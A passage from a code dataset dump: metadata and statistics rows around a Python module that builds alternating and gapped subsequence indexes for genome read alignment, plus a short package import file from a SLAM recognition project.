| 15.571429 | 29 | 0.779817 | 17 | 109 | 4.705882 | 0.470588 | 0.325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155963 | 109 | 6 | 30 | 18.166667 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0.045872 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
28a08294cde4f54867de8b043a1016c471914c50 | 2,459 | py | Python | src/Genome/alignment/SubseqIndex.py | jbhangoo/jbhangoo.github.io | dd9ae5238cd493388145f2fd33b8e848295d426a | [
"Apache-2.0"
] | null | null | null | src/Genome/alignment/SubseqIndex.py | jbhangoo/jbhangoo.github.io | dd9ae5238cd493388145f2fd33b8e848295d426a | [
"Apache-2.0"
] | null | null | null | src/Genome/alignment/SubseqIndex.py | jbhangoo/jbhangoo.github.io | dd9ae5238cd493388145f2fd33b8e848295d426a | [
"Apache-2.0"
] | null | null | null | import bisect
class AlternatingIndex(object):
    """ Holds a subsequence index for a text T """

    def __init__(self, t, k, ival):
        """ Create index from all subsequences consisting of k characters
        spaced ival positions apart. E.g., AlternatingIndex("ATAT", 2, 2)
        extracts ("AA", 0) and ("TT", 1). """
        self.k = k  # num characters per subsequence extracted
        self.ival = ival  # space between them; 1=adjacent, 2=every other, etc.
        self.index = []
        self.span = 1 + ival * (k - 1)
        for i in range(len(t) - self.span + 1):  # for each subseq
            self.index.append((t[i:i+self.span:ival], i))  # add (subseq, offset)
        self.index.sort()  # alphabetize by subseq

    def query(self, p):
        """ Return index hits for first subseq of p """
        subseq = p[:self.span:self.ival]  # query with first subseq
        i = bisect.bisect_left(self.index, (subseq, -1))  # binary search
        hits = []
        while i < len(self.index):  # collect matching index entries
            if self.index[i][0] != subseq:
                break
            hits.append(self.index[i][1])
            i += 1
        return hits


class GappedIndex(object):
    """ Holds a subsequence index for a text T """

    def __init__(self, t, k, ival):
        """ Create index from subsequences consisting of
        2 substrings of k characters spaced ival positions apart.
        E.g., GappedIndex("ATCCGG", 2, 2) extracts ("ATGG", 0)
        """
        self.k = k  # num characters per substring extracted
        self.ival = ival  # space between them; 1=adjacent, 2=every other, etc.
        self.index = []
        self.span = 2*k + ival
        for i in range(len(t) - self.span + 1):  # for each subseq
            self.index.append((t[i:k+i] + t[k+i+ival:2*k+i+ival], i))  # add (subseq, offset)
        self.index.sort()  # alphabetize by subseq

    def query(self, p):
        """ Return index hits for first subseq of p """
        subseq = p[:self.k] + p[self.k+self.ival:2*self.k+self.ival]  # query with first subseq
        print('search for ' + subseq)
        i = bisect.bisect_left(self.index, (subseq, -1))  # binary search
        hits = []
        while i < len(self.index):  # collect matching index entries
            if self.index[i][0] != subseq:
                break
            hits.append(self.index[i][1])
            i += 1
        return hits
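A small worked example of the alternating-subsequence index above (the condensed class here is restated for illustration, not part of the original file). For `t = "ATATAT"` with `k=2, ival=2`, the span is `1 + 2*(2-1) = 3`, so the extracted entries are `("AA", 0)`, `("TT", 1)`, `("AA", 2)`, `("TT", 3)`; a query takes the pattern's first subsequence and binary-searches the sorted list:

```python
import bisect


class AlternatingIndex:
    """Condensed copy of the AlternatingIndex class above, for demonstration."""

    def __init__(self, t, k, ival):
        self.k, self.ival = k, ival
        self.span = 1 + ival * (k - 1)
        # Sorted (subsequence, offset) pairs over every span-length window of t
        self.index = sorted((t[i:i + self.span:ival], i)
                            for i in range(len(t) - self.span + 1))

    def query(self, p):
        subseq = p[:self.span:self.ival]  # first subsequence of the pattern
        i = bisect.bisect_left(self.index, (subseq, -1))
        hits = []
        while i < len(self.index) and self.index[i][0] == subseq:
            hits.append(self.index[i][1])
            i += 1
        return hits


ind = AlternatingIndex("ATATAT", k=2, ival=2)
print(ind.index)         # [('AA', 0), ('AA', 2), ('TT', 1), ('TT', 3)]
print(ind.query("ATA"))  # first subseq is "AA" -> offsets [0, 2]
```

Each hit is only a candidate alignment; the caller still has to verify the full pattern at that offset, since only `k` of the pattern's characters were matched.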
| 42.396552 | 93 | 0.562017 | 338 | 2,459 | 4.059172 | 0.239645 | 0.091837 | 0.029155 | 0.033528 | 0.835277 | 0.835277 | 0.798834 | 0.798834 | 0.798834 | 0.798834 | 0 | 0.01592 | 0.310289 | 2,459 | 57 | 94 | 43.140351 | 0.793042 | 0.374136 | 0 | 0.75 | 0 | 0 | 0.006993 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.025 | 0 | 0.225 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9552d2e5dc7a6cd5f1eda4bbe0acbc281f5b62ec | 155 | py | Python | slam_recognition/util/energy/__init__.py | SimLeek/pySILEnT | feec2d1fb654d7c8dc25f610916f4e9b202a1092 | [
"Apache-2.0",
"MIT"
] | 5 | 2018-11-18T17:35:59.000Z | 2019-02-13T20:25:58.000Z | slam_recognition/util/energy/__init__.py | SimLeek/slam_recognition | feec2d1fb654d7c8dc25f610916f4e9b202a1092 | [
"Apache-2.0",
"MIT"
] | 12 | 2018-10-31T01:57:55.000Z | 2019-02-07T05:49:36.000Z | slam_recognition/util/energy/__init__.py | SimLeek/pySILEnT | feec2d1fb654d7c8dc25f610916f4e9b202a1092 | [
"Apache-2.0",
"MIT"
] | null | null | null | from .boosting import initialize_boosting, get_boosting
from .recovery import generate_constant_recovery, generate_input_based_recovery, generate_recovery
| 51.666667 | 98 | 0.896774 | 19 | 155 | 6.894737 | 0.526316 | 0.244275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070968 | 155 | 2 | 99 | 77.5 | 0.909722 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |